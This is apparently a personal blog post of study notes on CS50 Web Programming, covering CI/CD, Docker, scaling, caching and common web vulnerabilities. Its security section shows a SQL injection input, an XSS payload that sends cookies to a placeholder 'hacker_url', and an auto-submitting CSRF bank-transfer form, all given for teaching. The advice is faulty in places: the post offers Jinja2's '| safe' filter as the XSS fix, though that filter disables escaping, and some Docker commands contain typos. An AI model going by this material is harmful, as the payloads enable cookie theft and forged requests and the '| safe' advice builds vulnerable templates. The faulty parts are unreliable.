avatarJen-Hsuan Hsieh (Sean)

Summary

The article provides an overview of advanced web programming concepts including CI/CD, containerization, scalability, caching, and security, as part of the CS50 web programming course.

Abstract

This comprehensive article serves as a concluding note for CS50's web programming with Python and JavaScript, focusing on essential concepts beyond coding. It covers the introduction to CI/CD systems, emphasizing the roles of continuous integration and continuous delivery, and the advantages of using such systems. The article delves into containerization with Docker, comparing it to virtual machines, and explains Dockerfile usage and Docker-compose for managing containerized applications. Scalability concerns are addressed, including horizontal scaling and load balancing strategies. The importance of caching, both client-side and server-side, is discussed, with references to further reading on browser rendering. Security is a significant focus, detailing the use of HTTPS, environment variables, and API design considerations to prevent common vulnerabilities such as SQL injection, XSS, CSRF, and DDoS attacks. The author, Sean, shares his insights as a software engineer, invites feedback, and provides links to related topics and his social media for further engagement.

Opinions

  • The author believes that understanding CI/CD systems is crucial for reproducibility, tidy deployment, fast deployment, and automation of various development tasks.
  • There is a clear preference for Docker over traditional virtual machines due to its efficient use of resources and ease of management.
  • The author emphasizes the importance of scalability planning, particularly the benefits and challenges of horizontal scaling and the use of load balancers.
  • Caching is highlighted as a critical component for web performance, with the author suggesting specific HTTP headers for client-side caching and advocating for server-side caching solutions.
  • Security is not just a feature but a fundamental aspect of web development, with the author providing practical advice on using HTTPS, protecting sensitive information with environment variables, and implementing rate limiting and route authentication in APIs.
  • The author conveys the significance of being aware of and protecting against common security vulnerabilities, offering examples and solutions for each.
  • Sean encourages continuous learning and sharing of knowledge, as evidenced by the numerous references to his other articles and the invitation for readers to engage with him on social media.

CS50’s Web Programming with Python and JavaScript 2020 — CI/CD, Containerization, Scalability, Caching, and Security

Introduction

It’s the last note for the CS50 web programming. The following sections don’t have too much code. I thought it will be helpful for the beginner to know these basic concepts.

About this Series

This series aims to wrap up contents of CS50’s Web Programming with Python and JavaScript.

The introduction to CI/CD system

The tasks of the Continuous Integration(CI)

1.Frequent merge to main branch

2.Automated unit testing

The tasks of the Continuously Delivery (CD)

1.CD needs CI: deploy all changes to the code?

2.Automated deployments

Why CI/CD system?

There are few advantages of CI/CD system.

1.Reproducibility

  • Everyone have the same environment which is predictable

2.Tidy deployment

  • Test in an environment that matches your production environment

3.Fast deployment

  • Improvement of confidence in code and pull requests

4.Automate all the things: code coverage, linting, language runtimes, dependency management, config management

Travis CI

Travis CI is the Leader continuous integration platform. It starts in 2011 in open source, move to paid and enterprise.

Travis-CI is Github based. Github will notify Travis CI when the developer push the code. Travis will pull code from Github and run test automatically.

source: https://travis-ci.com

The steps to use Travis CI

1.Login to Travis-CI

2. Add .travis.yml

language: python
python:
    - 3.6
install:
    - pip install -r requirement.txt
script:
    - python manage.py test

The introduction to Containerization

Comparing Docker and Virtual machine

  • Virtual machine: has a guest operating system on the machine
  • Docker: build directly on the top of the operating system. It just to add an additional layer to help to keep these containers isolated from each other
source: https://www.docker.com/resources/what-container

Dockerfile

1.Create a Dockerfile

FROM python:3
WORKDIR /usr/src/app
ADD requirements.txt /usr/src/app
RUN pip install -r requirements.txt
ADD ./usr/src/app

2.Run the command to build a docker image

docker build .

Docker-compose

1.Create docker-compose.yml

- build: build the docker image (in the current directory)

- command

- volumes: link the current directory to the directory in docker image

- ports: inside container maps to the machine’s port

version: '3'
services:
    db:
        image: postgres
    migration:
        build: .
        command: python.py manage.py migrate
        volumes:
            - .:/usr/src/app
        depends_on:
            - db
    web:
        build: .
        command: python3 manage.py runserver 0.0.0.0:8000
        volumes:
            - .:/usr/src/app
        ports:
            - "8000:8000"
        depends_on:
            - db
            - migration

2.Run the command to up the services

docker-compose up

Docker container

1.Run the following command to up the services

docker ps

2.Get inside the Docker container

docker exec -it <container id> bash -l

Scalability

Developers have to take into account when the service becomes popular. They have to consider some questions.

1. How to typically measure how many things a server can do in a given mount of time?

  • Benchmarking
  • Figuring out how much the server can actually handle, the maximum capacity

2. How we might deal with the situation that there are a lot of requests when the service becomes popular?

  1. Vertical scaling: add more resources for the server, but it’s going to hit some sort of limit on vertical scaling
  2. Horizontal scaling: add more server instance, but we have to consider the database race condition and the load balancer

3. The concerns of the horizontal scaling (Load balancing)

  • We have to worry about the time cost will increase whenever introducing new hardwares

Horizontal scaling (Load balancing)

How load balancer decides where to send the user?

  1. Random choice: we have to worry about that the user’s session will be wrong if the user visit the service at the second time
  2. Round-robin
  3. Fewest connections

Session-aware load balancing: redirect the user to the same server

  1. Sticky sessions
  2. Sessions in Database: we also have to scale the database
  3. Client-Side sessions: use cookies to store the session

Scaling database

Database partitioning

  1. Vertical database partitioning: separate a table to multiple tables . Relate tables with foreign key
  2. Horizontal database partitioning: split rows of a table into different tables or store them in different server

Database replication

1.Single-Primary replication:

  • We can only write the primary database. Then the primary database will update other databases. The drawback is that it’s hard to handle frequent writing operations.

2.Multiple-Primary replication

  • We can write the all databases. All databases can update other databases. The drawback is that it’s possible to have conflicts between changes

Caching

Client-side caching

  • Cache-Control: max-age=86400
  • ETag: “3232444234325355768679”

Server-side caching

  • The external cache has more space rather than the local memory.

I have also studied something related to the HTTP cache. Feel free to refer to the following article.

Security

Use HTTPS (Public-key cryptography)

There are two roles.

1.public key:

  • It should be able to share with everyone
  • We can only use it to encrypt information. It will take plain text and it will generate the ciphertext

2.private key

  • It should only be kept to yourself. You should never share it with everyone.
  • We can be use it to decrypt data

I have also studied something related to the HTTPs. Feel free to refer to the following article.

Use environment variables

  • To avoid exposing the private information to the public repository. The following example is how to use environment variables in Flask.
app.config["SECRET_KEY"] = os.environ.get("SECRET_KEY")

Design APIs with the key

  • Rate limiting
  • Route authentication

Potential vulnerabilities

SQL injection

  • If we have a following format of SQL query
select * from users
    where (username = '" + username + "')
    and (password = '" + password + "');
  • We may expect the following query
select * from users
    where (username = 'alice')
    and (password = 'hello');
  • It will have mistakes if someone puts the following things in the SQL query
select * from users
    where (username = 'alice')
    and (password = '1' or '1' = '1');

Cross-Site Scripting (XSS)

  • Someone injects JavaScript code or anything can run to the server. For example, we have an endpoint for 404
from flask import Flask, request
app = Flask(__name__)
@app.errorhandler(404)
def page_not_found(e):
    return "Not found" + request.path
  • The following URL will pass the cookie to the hacker’s website if someone uses the following request path. Some browsers like Chrome will detect this kind of erros and block them. (ERR_BLOCKED_BY_XSS_AUDITOR)
/<script>document.write('<img src = "hacker_url?cookie=" + document.cookie + ">')</script>
  • Solution: Jinja2 provides safe
{% for message in messages %}
    <li>{{message.contents | safe}}</li>
{% endfor %}

Cross-Site Request Forgery (CSRF)

  • Forge a request to some other website. For example, the following code will send a hidden form when the page is loaded.
<body onload = "document.form[0].submit()">
    <form action = "https://yourbank.com/transfer " method = "post">  
        <input type = 'hidden' name = "to" value = "brian"/>
        <input type = 'hidden' name = "amt" value = "2000"/>
        <input type = 'submit' value = "click here"/>
    </form>
</body>
  • Solution: Django provides csrf token
<form action = "/transfer " method = "post"> 
    {% csrf_token%}
    <input name = "to" value = "brian"/>
    <input name = "amt" value = "2000"/>
    <input type = 'submit' value = "click here"/>
</form>

DDoS attacks

  • limit how many requests can make
  • server level, ISP level

References

Summary

Thanks for your patient. I am Sean. I work as a software engineer.

This article is my note. Please feel free to give me advice if any mistakes. I am looking forward to your feedback.

Please feel free to clap if this article can help you. Thank you.

You can also subscribe my page on Facebook.

Related topics

How to use the two-way binding in Knout.js and ReactJS?

Learn how to use SignalR to build a chatroom application

My reflection of :

IT & Network:

Database:

Software testing:

Debugging:

DevOps:

Travis Ci
Security
Scalability
Software Development
Cs50w
Recommended from ReadMedium